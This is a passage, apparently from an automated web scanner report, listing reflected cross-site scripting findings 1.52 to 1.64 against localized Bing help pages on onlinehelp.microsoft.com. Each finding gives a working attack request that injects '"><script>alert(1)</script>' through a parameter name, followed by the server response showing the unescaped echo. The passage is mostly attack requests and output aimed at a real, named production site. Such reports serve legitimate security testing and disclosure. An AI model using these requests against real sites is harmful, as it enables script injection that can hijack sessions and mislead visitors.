The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cc82"><script>alert(1)</script>d3139b44bce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pt-PT/bing/ff808535(pt-PT).aspx?6cc82"><script>alert(1)</script>d3139b44bce=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:05:57 GMT
Content-Length: 37717


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/pt-pt/bing/ff808535.aspx?6cc82"><script>alert(1)</script>d3139b44bce=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.52. http://onlinehelp.microsoft.com/ro-RO/bing/ff808535(ro-RO).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ro-RO/bing/ff808535(ro-RO).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6541f"><script>alert(1)</script>372e44c8346 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ro-RO/bing/ff808535(ro-RO).aspx?6541f"><script>alert(1)</script>372e44c8346=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:03 GMT
Content-Length: 38150


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/ro-ro/bing/ff808535.aspx?6541f"><script>alert(1)</script>372e44c8346=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.53. http://onlinehelp.microsoft.com/ru-RU/bing/ff808535(ru-RU).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /ru-RU/bing/ff808535(ru-RU).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb38c"><script>alert(1)</script>5573df46784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ru-RU/bing/ff808535(ru-RU).aspx?bb38c"><script>alert(1)</script>5573df46784=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:11 GMT
Content-Length: 40317


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20%d0%a1%d0%be%d0%b4%d0%b5%d1%80%d0%b6%d0%b0%d0%bd%d0%b8%d0%b5&body=http://onlinehelp.microsoft.com/ru-ru/bing/ff808535.aspx?bb38c"><script>alert(1)</script>5573df46784=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.54. http://onlinehelp.microsoft.com/sk-SK/bing/ff808535(sk-SK).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /sk-SK/bing/ff808535(sk-SK).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366d8"><script>alert(1)</script>fcae64b6ab2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sk-SK/bing/ff808535(sk-SK).aspx?366d8"><script>alert(1)</script>fcae64b6ab2=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:03 GMT
Content-Length: 38191


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/sk-sk/bing/ff808535.aspx?366d8"><script>alert(1)</script>fcae64b6ab2=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.55. http://onlinehelp.microsoft.com/sl-SI/bing/ff808535(sl-SI).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /sl-SI/bing/ff808535(sl-SI).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c4c6"><script>alert(1)</script>58701c7d1bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sl-SI/bing/ff808535(sl-SI).aspx?6c4c6"><script>alert(1)</script>58701c7d1bc=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:08 GMT
Content-Length: 38055


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/sl-si/bing/ff808535.aspx?6c4c6"><script>alert(1)</script>58701c7d1bc=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.56. http://onlinehelp.microsoft.com/sr-Cyrl-CS/bing/ff808535(sr-Cyrl-CS).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /sr-Cyrl-CS/bing/ff808535(sr-Cyrl-CS).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e645"><script>alert(1)</script>62b8ccc027c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sr-Cyrl-CS/bing/ff808535(sr-Cyrl-CS).aspx?7e645"><script>alert(1)</script>62b8ccc027c=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:14 GMT
Content-Length: 44881


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/sr-cyrl-cs/bing/ff808535(en-us).aspx?7e645"><script>alert(1)</script>62b8ccc027c=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.57. http://onlinehelp.microsoft.com/sr-Latn-CS/bing/ff808535(sr-Latn-CS).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /sr-Latn-CS/bing/ff808535(sr-Latn-CS).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81f60"><script>alert(1)</script>a7b6fb8a8ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sr-Latn-CS/bing/ff808535(sr-Latn-CS).aspx?81f60"><script>alert(1)</script>a7b6fb8a8ad=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:08 GMT
Content-Length: 44568


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/sr-latn-cs/bing/ff808535(en-us).aspx?81f60"><script>alert(1)</script>a7b6fb8a8ad=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.58. http://onlinehelp.microsoft.com/sv-SE/bing/ff808535(sv-SE).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /sv-SE/bing/ff808535(sv-SE).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e47d"><script>alert(1)</script>52461ddaf74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sv-SE/bing/ff808535(sv-SE).aspx?4e47d"><script>alert(1)</script>52461ddaf74=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:08 GMT
Content-Length: 37815


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Hj%c3%a4lpen%20Inneh%c3%a5llsf%c3%b6rteckning&body=http://onlinehelp.microsoft.com/sv-se/bing/ff808535.aspx?4e47d"><script>alert(1)</script>52461ddaf74=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.59. http://onlinehelp.microsoft.com/th-TH/bing/ff808535(th-TH).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /th-TH/bing/ff808535(th-TH).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c76"><script>alert(1)</script>c27e57e6128 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /th-TH/bing/ff808535(th-TH).aspx?77c76"><script>alert(1)</script>c27e57e6128=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:11 GMT
Content-Length: 38916


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/th-th/bing/ff808535.aspx?77c76"><script>alert(1)</script>c27e57e6128=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.60. http://onlinehelp.microsoft.com/tr-TR/bing/ff808535(tr-TR).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /tr-TR/bing/ff808535(tr-TR).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3adb8"><script>alert(1)</script>af56ce9ec17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /tr-TR/bing/ff808535(tr-TR).aspx?3adb8"><script>alert(1)</script>af56ce9ec17=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:10 GMT
Content-Length: 38148


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/tr-tr/bing/ff808535.aspx?3adb8"><script>alert(1)</script>af56ce9ec17=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.61. http://onlinehelp.microsoft.com/uk-UA/bing/ff808535(uk-UA).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /uk-UA/bing/ff808535(uk-UA).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94669"><script>alert(1)</script>d0a20a7ffc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk-UA/bing/ff808535(uk-UA).aspx?94669"><script>alert(1)</script>d0a20a7ffc4=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:16 GMT
Content-Length: 38634


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/uk-ua/bing/ff808535.aspx?94669"><script>alert(1)</script>d0a20a7ffc4=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.62. http://onlinehelp.microsoft.com/vi-VN/bing/ff808535(vi-VN).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /vi-VN/bing/ff808535(vi-VN).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0095"><script>alert(1)</script>2e78b5a7d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /vi-VN/bing/ff808535(vi-VN).aspx?f0095"><script>alert(1)</script>2e78b5a7d91=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:08 GMT
Content-Length: 44421


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/vi-vn/bing/ff808535(en-us).aspx?f0095"><script>alert(1)</script>2e78b5a7d91=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.63. http://onlinehelp.microsoft.com/zh-CN/bing/ff808535(zh-CN).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /zh-CN/bing/ff808535(zh-CN).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2254e"><script>alert(1)</script>b5cf2f9fb5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /zh-CN/bing/ff808535(zh-CN).aspx?2254e"><script>alert(1)</script>b5cf2f9fb5e=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:23 GMT
Content-Length: 37699


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/zh-cn/bing/ff808535.aspx?2254e"><script>alert(1)</script>b5cf2f9fb5e=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.64. http://onlinehelp.microsoft.com/zh-HK/bing/ff808535(zh-HK).aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /zh-HK/bing/ff808535(zh-HK).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c4e"><script>alert(1)</script>d224097e515 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /zh-HK/bing/ff808535(zh-HK).aspx?20c4e"><script>alert(1)</script>d224097e515=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:26 GMT
Content-Length: 36266


<?xml version="1.0" encoding="UTF-8" ?>
